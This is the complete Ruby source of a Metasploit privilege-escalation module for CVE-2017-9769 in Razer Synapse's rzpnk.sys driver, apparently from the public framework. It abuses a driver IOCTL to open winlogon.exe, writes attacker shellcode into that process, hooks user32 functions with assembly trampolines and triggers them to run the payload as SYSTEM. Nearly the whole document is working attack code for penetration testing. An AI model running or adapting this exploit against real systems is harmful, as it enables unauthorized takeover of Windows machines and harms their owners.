1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/exploit/local/windows_kernel' require 'rex' require 'metasm' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::Windows::Priv # the max size our hook can be, used before it's generated for the allocation HOOK_STUB_MAX_LENGTH = 256 def initialize(info = {}) super(update_info(info, 'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess', 'Description'=> %q{ A vulnerability exists in the latest version of Razer Synapse (v2.20.15.1104 as of the day of disclosure) which can be leveraged locally by a malicious application to elevate its privileges to those of NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver that passes a PID specified by the user to ZwOpenProcess. This can be issued by an application to open a handle to an arbitrary process with the necessary privileges to allocate, read and write memory in the specified process. This exploit leverages this vulnerability to open a handle to the winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by installing a hook to execute attacker controlled shellcode. This hook is then triggered on demand by calling user32!LockWorkStation(), resulting in the attacker's payload being executed with the privileges of the infected winlogon process. In order for the issued IOCTL to work, the RazerIngameEngine.exe process must not be running. This exploit will check if it is, and attempt to kill it as necessary. The vulnerable software can be found here: https://www.razerzone.com/synapse/. No Razer hardware needs to be connected in order to leverage this vulnerability. This exploit is not opsec-safe due to the user being logged out as part of the exploitation process. }, 'Author' => 'Spencer McIntyre', 'License'=> MSF_LICENSE, 'References' => [ ['CVE', '2017-9769'], ['URL', 'https://warroom.securestate.com/cve-2017-9769/'] ], 'Platform' => 'win', 'Targets'=> [ # Tested on (64 bits): # * Windows 7 SP1 # * Windows 10.0.10586 [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 20 }, 'DefaultTarget'=> 0, 'Privileged' => true, 'DisclosureDate' => 'Mar 22 2017')) end def check # Validate that the driver has been loaded and that # the version is the same as the one expected client.sys.config.getdrivers.each do |d| if d[:basename].downcase == 'rzpnk.sys' expected_checksum = 'b4598c05d5440250633e25933fff42b0' target_checksum = client.fs.file.md5(d[:filename]) if expected_checksum == Rex::Text.to_hex(target_checksum, '') return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected end end end Exploit::CheckCode::Safe end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end if check == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') end if session.platform != 'windows' fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') elsif session.arch != ARCH_X64 fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets') end pid = session.sys.process['RazerIngameEngine.exe'] if pid # if this process is running, the IOCTL won't work but the process runs # with user privileges so we can kill it print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...") session.sys.process.kill(pid) end pid = session.sys.process['winlogon.exe'] print_status("Found winlogon pid: #{pid}") handle = get_handle(pid) fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil? vprint_status('Successfully opened a handle to the winlogon process') winlogon = session.sys.process.new(pid, handle) allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH shellcode_address = winlogon.memory.allocate(allocation_size) winlogon.memory.protect(shellcode_address) print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}") winlogon.memory.write(shellcode_address, payload.encoded) hook_stub_address = shellcode_address + payload.encoded.length result = session.railgun.kernel32.LoadLibraryA('user32') fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0 user32_handle = result['return'] # resolve and backup the functions that we'll install trampolines in user32_trampolines = {}# address => original chunk user32_functions = ['LockWindowStation'] user32_functions.each do |function| address = get_address(user32_handle, function) winlogon.memory.protect(address) user32_trampolines[function] = { address:address, original: winlogon.memory.read(address, 24) } end # generate and install the hook asm hook_stub = get_hook(shellcode_address, user32_trampolines) fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil? # if this happens, there was a programming error fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH winlogon.memory.write(hook_stub_address, hook_stub) vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}") # install the asm trampolines to jump to the hook user32_trampolines.each do |function, trampoline_info| address = trampoline_info[:address] trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{ movrax, 0x#{address.to_s(16)} push rax movrax, 0x#{hook_stub_address.to_s(16)} jmprax }).encode_string winlogon.memory.write(address, trampoline) vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}") end session.railgun.user32.LockWorkStation() session.railgun.kernel32.CloseHandle(handle) end def get_address(dll_handle, function_name) result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name) fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0 result['return'] end # this is where the actual vulnerability is leveraged def get_handle(pid) handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') return nil unless handle vprint_status('Successfully opened a handle to the driver') buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL') session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[ ['DWORD','FileHandle', 'in' ], ['DWORD','Event','in' ], ['LPVOID', 'ApcRoutine', 'in' ], ['LPVOID', 'ApcContext', 'in' ], ['PDWORD', 'IoStatusBlock','out'], ['DWORD','IoControlCode','in' ], ['PBLOB','InputBuffer','in' ], ['DWORD','InputBufferLength','in' ], ['PBLOB','OutputBuffer', 'out'], ['DWORD','OutputBufferLength', 'in' ], ]) result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length) return nil if result['return'] != 0 session.railgun.kernel32.CloseHandle(handle) result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1] end def get_hook(shellcode_address, restore) dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return'] return nil if dll_handle == 0 create_thread_address = get_address(dll_handle, 'CreateThread') stub = %{ call main ; restore the functions where the trampolines were installed push rbx } restore.each do |function, trampoline_info| original = trampoline_info[:original].unpack('Q*') stub << "movrax, 0x#{trampoline_info[:address].to_s(16)}" original.each do |chunk| stub << %{ movrbx, 0x#{chunk.to_s(16)} movqword ptr ds:[rax], rbx addrax, 8 } end end stub << %{ poprbx ret main: ; backup registers we're going to mangle push r9 push r8 push rdx push rcx ; setup the arguments for the call to CreateThread xorrax, rax push rax; lpThreadId push rax; dwCreationFlags xorr9, r9 ; lpParameter movr8, 0x#{shellcode_address.to_s(16)}; lpStartAddress xorrdx, rdx ; dwStackSize xorrcx, rcx ; lpThreadAttributes movrax, 0x#{create_thread_address.to_s(16)} ; &CreateThread call rax addrsp, 16 ; restore arguments that were mangled poprcx poprdx popr8 popr9 ret } Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string end end |